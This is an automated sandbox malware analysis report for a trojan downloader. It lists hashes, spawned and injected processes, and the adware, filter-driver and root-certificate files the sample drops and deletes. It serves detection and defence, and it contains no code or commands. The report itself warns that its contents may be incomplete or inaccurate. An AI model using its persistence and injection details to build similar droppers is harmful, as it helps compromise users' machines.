Trojan-Downloader.NSIS.Adload.bs (Kaspersky), Installer.Win32.InnoSetup.2.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Installer, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 5108469d6aedae76348b6e88ba3e8a65
SHA1: 2004a3616720384de308cec8c31ca91ec824821b
SHA256: 3c57d2e68ac69215ca6c80560b70b90cfdada8461094451d1584aa810e394833
SSDeep: 1536:mQpQ5EP0ijnRTXJOG5ZRr2CEU5170WC3/88fojRhAaS2Wib9xeNhS:mQIURTXJOG5ZRr2Cn550W88R1Bb9gNk
Size: 71088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392
net1.exe:976
net1.exe:2596
net1.exe:2220
net1.exe:2588
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196
310714_is.tmp:1388
ProtectService.exe:3496
ProtectService.exe:3676
ProtectService.exe:3468
XTab_Setup2121.exe:3372
wpm_v20.0.0.1953_0302.exe:3104
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248
net.exe:2552
net.exe:1808
net.exe:2556
net.exe:400
QQBrowser.exe:2908
QQBrowser.exe:2216
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660
HPNotify.exe:3664
ActSys.exe:2440
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628
cmdshell.exe:3548
amisetup5755__9664.exe:1532
nfregdrv.exe:976
nfregdrv.exe:1540
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452
CashReminder.exe:596
sc.exe:3420
sc.exe:3396
GOSafer.exe:2464
GOSafer.exe:2604
WNet.exe:256
310714_is.exe:1880
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180
The Trojan injects its code into the following process(es):
q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316
ActSys.exe:2648
%original file name%.exe:1396
CashReminder.exe:1232
WNet.exe:2284
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
%Program Files%\ActSys\ActSys.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (66 bytes)
%Program Files%\ActSys\asfilterdrv.sys (1856 bytes)
%System%\drivers\asfilterdrv.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
%Program Files%\ActSys\remove_ActSys.exe (825 bytes)
%Program Files%\ActSys\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
%Program Files%\ActSys\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (780 bytes)
%Program Files%\ActSys\libeay32.dll (35507 bytes)
%Program Files%\ActSys\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv13.tmp (130190 bytes)
%Program Files%\ActSys\ProtocolFilters.dll (35001 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (0 bytes)
%Program Files%\ActSys\asfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (0 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (3185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp (0 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\MobiMidia_validation[1].js (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310113f8[1].htm (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\i[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\010914i[1].htm (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\icone_cadeado[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\carregando[1].gif (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\310113f8[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\010914i[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\mt-core[1].js (55269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\top-line[1].gif (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4.tmp (0 bytes)
The process XTab_Setup2121.exe:3372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files%\XTab\searchProvider.xml (8 bytes)
%Program Files%\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files%\XTab\web\ver.txt (47 bytes)
%Program Files%\XTab\web\img\icon128.png (9 bytes)
%Program Files%\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files%\XTab\skin\input_bk.png (2 bytes)
%Program Files%\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files%\XTab\CmdShell.exe (1685 bytes)
%Program Files%\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files%\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files%\XTab\skin\logo.png (5 bytes)
%Program Files%\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files%\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files%\XTab\web\js\common.js (2 bytes)
%Program Files%\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files%\XTab\skin\conf.xml (8 bytes)
%Program Files%\XTab\skin\btn.png (2 bytes)
%Program Files%\XTab\skin\conf_back.png (1623 bytes)
%Program Files%\XTab\web\js\library.js (4216 bytes)
%Program Files%\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files%\XTab\install.data (93 bytes)
%Program Files%\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files%\XTab\uninstall.exe (1343 bytes)
%Program Files%\XTab\web\img\google_trends.png (7 bytes)
%Program Files%\XTab\web\data.html (20 bytes)
%Program Files%\XTab\IeWatchDog.dll (20 bytes)
%Program Files%\XTab\skin\radio_2.png (3 bytes)
%Program Files%\XTab\web\js\ga.js (1568 bytes)
%Program Files%\XTab\ffsearch_toolbar!1.0.0.1028.xpi (15 bytes)
%Program Files%\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files%\XTab\web\js\xagainit2.0.js (4 bytes)
%Program Files%\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files%\XTab\skin\radio_1.png (3 bytes)
%Program Files%\XTab\msvcp110.dll (16990 bytes)
%Program Files%\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files%\XTab\web\indexIE.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (11 bytes)
%Program Files%\XTab\web\indexIE8.html (1794 bytes)
%Program Files%\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files%\XTab\web\img\icon48.png (3 bytes)
%Program Files%\XTab\skin\close.png (3 bytes)
%Program Files%\XTab\skin\about.png (4 bytes)
%Program Files%\XTab\web\js\js.js (18 bytes)
%Program Files%\XTab\skin\settings.png (5 bytes)
%Program Files%\XTab\web\img\icon16.png (628 bytes)
%Program Files%\XTab\skin\about_bk.png (1436 bytes)
%Program Files%\XTab\SupTab.dll (15406 bytes)
%Program Files%\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files%\XTab\msvcr110.dll (21280 bytes)
%Program Files%\XTab\ProtectService.exe (5309 bytes)
%Program Files%\XTab\skin\main.xml (4 bytes)
%Program Files%\XTab\web\main.css (19 bytes)
%Program Files%\XTab\HPNotify.exe (17941 bytes)
%Program Files%\XTab\conf (1694 bytes)
%Program Files%\XTab\web\img\loading.gif (5 bytes)
%Program Files%\XTab\skin\btn_apply.png (6 bytes)
%Program Files%\XTab\web\img\logo32.ico (4 bytes)
%Program Files%\XTab\BrowserAction.dll (33992 bytes)
%Program Files%\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files%\XTab\BrowerWatchFF.dll (23 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp (0 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GOSafer\nfregdrv.exe (1552 bytes)
%Program Files%\GOSafer\gosafer.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg17.tmp (66910 bytes)
%System%\drivers\gosaferdrv.sys (55 bytes)
%Program Files%\GOSafer\uninst.exe (1793 bytes)
%Program Files%\GOSafer\ProtocolFilters.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (5 bytes)
%Program Files%\GOSafer\libeay32.dll (35507 bytes)
%Program Files%\GOSafer\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (11 bytes)
%Program Files%\GOSafer\nfapi.dll (4992 bytes)
%Program Files%\GOSafer\gosaferdrv.sys (1856 bytes)
The Trojan deletes the following file(s):
%Program Files%\GOSafer\gosaferdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (0 bytes)
The process QQBrowser.exe:2908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (3566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WebDataJs (40 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (0 bytes)
The process QQBrowser.exe:2216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\Thumbs.db (27 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe (14022 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\479.json (512 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (993 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\Thumbs.db (42 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\scrollbar.bmp (37 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg.png (673 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\CashReminder\ssleay32.dll (12088 bytes)
%Program Files%\CashReminder\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (11 bytes)
%System%\drivers\crfilterdrv.sys (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp (67341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\CashReminder\libeay32.dll (35507 bytes)
%Program Files%\CashReminder\uninstall.exe (1568 bytes)
%Program Files%\CashReminder\nfregdrv.exe (1552 bytes)
%Program Files%\CashReminder\CashReminder.exe (15536 bytes)
%Program Files%\CashReminder\crfilterdrv.sys (1856 bytes)
%Program Files%\CashReminder\ProtocolFilters.dll (9320 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq7.tmp (0 bytes)
%Program Files%\CashReminder\crfilterdrv.sys (0 bytes)
The process HPNotify.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\XTab\conf (1630 bytes)
The process ActSys.exe:2648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\P_RuleList.txt (180 bytes)
%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.pvk (1 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\rules[1].txt (180 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\P_RuleList.txt (0 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\WNet\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (5 bytes)
%Program Files%\WNet\WNet.exe (15168 bytes)
%Program Files%\WNet\uninst.exe (1720 bytes)
%Program Files%\WNet\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyF.tmp (68079 bytes)
%System%\drivers\ssfilterdrv.sys (55 bytes)
%Program Files%\WNet\ProtocolFilters.dll (9320 bytes)
%Program Files%\WNet\nfapi.dll (4992 bytes)
%Program Files%\WNet\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (11 bytes)
%Program Files%\WNet\ssfilterdrv.sys (1856 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (0 bytes)
%Program Files%\WNet\ssfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (0 bytes)
The process cmdshell.exe:3548 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\rebirth[1].htm (0 bytes)
The process amisetup5755__9664.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\index[1].htm (2203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\amipb[1].js (34728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (27 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (0 bytes)
The process %original file name%.exe:1396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1] (64392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1] (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe (110758 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1] (44832 bytes)
